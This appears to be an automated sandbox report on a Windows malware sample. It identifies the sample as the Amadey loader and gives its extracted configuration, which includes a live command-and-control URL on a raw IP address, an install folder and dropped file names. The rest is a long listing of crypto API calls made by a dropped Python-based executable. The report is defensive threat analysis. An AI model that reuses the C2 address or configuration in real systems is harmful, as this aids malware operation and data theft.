Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.43/Zu7JuNko/index.php8	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php$	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB9710 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptUnprotectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,Py_BuildValue,LocalFree,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,	8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB50E0 CryptReleaseContext,	8_2_00007FF8B7EB50E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB48D8 PyArg_ParseTupleAndKeywords,CryptDuplicateKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB48D8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EB5CD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB50D0 CryptReleaseContext,	8_2_00007FF8B7EB50D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBA0D0 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,	8_2_00007FF8B7EBA0D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB94B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptProtectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyMem_Free,	8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4490 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,	8_2_00007FF8B7EB4490
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBE870 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBE870
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3C60 PyArg_ParseTupleAndKeywords,CryptDuplicateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB3C60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBC860 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBC860
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4050 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptVerifySignatureW,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EB4050
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4430 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,	8_2_00007FF8B7EB4430
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB9C30 PyList_New,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format,	8_2_00007FF8B7EB9C30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3C10 CryptDestroyHash,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBD010 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptGetMessageSignerCount,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyLong_FromLong,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBD010
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5000 CryptMsgClose,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,	8_2_00007FF8B7EB5000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBF000 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,_Py_Dealloc,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,Py_BuildValue,PyMem_Free,	8_2_00007FF8B7EBF000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB43E0 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,	8_2_00007FF8B7EB43E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBAFD0 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_SetString,PyExc_TypeError,PyErr_SetString,PyArg_ParseTuple,PyLong_AsLong,PyErr_Occurred,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyBytes_AsString,PyEval_SaveThread,CryptFindOIDInfo,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EBAFD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4BC0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,malloc,PyErr_NoMemory,memcpy,CryptDecrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EB4BC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBC3B0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBC3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBD3B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyDetachedMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,free,free,??1PyWinBufferView@@QEAA@XZ,free,	8_2_00007FF8B7EBD3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3BA0 CryptDestroyHash,	8_2_00007FF8B7EB3BA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5B90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptCreateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB5B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5F80 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,PyArg_ParseTupleAndKeywords,CryptImportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB5F80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBCB80 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,??1PyWinBufferView@@QEAA@XZ,free,	8_2_00007FF8B7EBCB80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3B70 CryptDestroyHash,	8_2_00007FF8B7EB3B70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3B60 CryptDestroyHash,	8_2_00007FF8B7EB3B60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4F60 CryptMsgClose,_Py_Dealloc,	8_2_00007FF8B7EB4F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5350 PyArg_ParseTupleAndKeywords,CryptGetProvParam,malloc,PyExc_MemoryError,PyErr_Format,CryptGetProvParam,PyExc_NotImplementedError,PyErr_SetString,free,CryptGetProvParam,PyBool_FromLong,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,CryptGetProvParam,GetLastError,malloc,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBA350 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptFindLocalizedName,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,	8_2_00007FF8B7EBA350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4740 PyArg_ParseTupleAndKeywords,CryptGetKeyParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetKeyParam,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,free,	8_2_00007FF8B7EB4740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBB740 PyArg_ParseTupleAndKeywords,PyList_New,PyEval_SaveThread,CryptEnumOIDInfo,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EBB740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4F10 CryptMsgClose,_Py_Dealloc,	8_2_00007FF8B7EB4F10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3F00 PyArg_ParseTupleAndKeywords,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,	8_2_00007FF8B7EB3F00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4ED0 CryptMsgClose,_Py_Dealloc,	8_2_00007FF8B7EB4ED0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB9A90 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptAcquireContextW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,	8_2_00007FF8B7EB9A90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBCE90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyExc_TypeError,PyErr_SetString,PyEval_SaveThread,CryptGetMessageCertificates,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,PyLong_FromVoidPtr,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBCE90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5270 PyArg_ParseTupleAndKeywords,CryptGenKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB5270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBBA70 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_Format,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptQueryObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,Py_BuildValue,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,	8_2_00007FF8B7EBBA70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB9E70 PyList_New,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,_Py_NoneStruct,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format,	8_2_00007FF8B7EB9E70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBEE70 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W_J@Z,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EBEE70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5A60 PyArg_ParseTupleAndKeywords,malloc,PyExc_MemoryError,PyErr_Format,memset,memcpy,CryptGenRandom,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,	8_2_00007FF8B7EB5A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5E40 PyArg_ParseTupleAndKeywords,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,	8_2_00007FF8B7EB5E40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB3E30 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptHashSessionKey,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB3E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB2E30 PyExc_ValueError,PyErr_SetString,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptAcquireCertificatePrivateKey,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,CryptContextAddRef,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,Py_BuildValue,	8_2_00007FF8B7EB2E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBA230 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptSetProviderExW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,	8_2_00007FF8B7EBA230
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBBE2C _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,CertFreeCertificateContext,	8_2_00007FF8B7EBBE2C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB49F0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ,	8_2_00007FF8B7EB49F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBC5F0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,CertCloseStore,free,	8_2_00007FF8B7EBC5F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB51E0 PyArg_ParseTupleAndKeywords,CryptReleaseContext,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB51E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBD9C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,_Py_NoneStruct,PyExc_NotImplementedError,PyErr_SetString,strcmp,malloc,PyExc_MemoryError,PyErr_Format,strcmp,PyExc_NotImplementedError,PyErr_Format,PyErr_Format,malloc,PyEval_SaveThread,CryptEncodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,strcmp,free,LocalFree,	8_2_00007FF8B7EBD9C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBD5C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,	8_2_00007FF8B7EBD5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB45B0 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptExportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportKey,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,	8_2_00007FF8B7EB45B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB4180 PyArg_ParseTupleAndKeywords,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_Format,PyBytes_FromStringAndSize,PyLong_FromUnsignedLong,free,	8_2_00007FF8B7EB4180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBB180 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptGetKeyIdentifierProperty,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,LocalFree,??1PyWinBufferView@@QEAA@XZ,PyMem_Free,	8_2_00007FF8B7EBB180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB596C PyArg_ParseTupleAndKeywords,CryptGetUserKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,	8_2_00007FF8B7EB596C
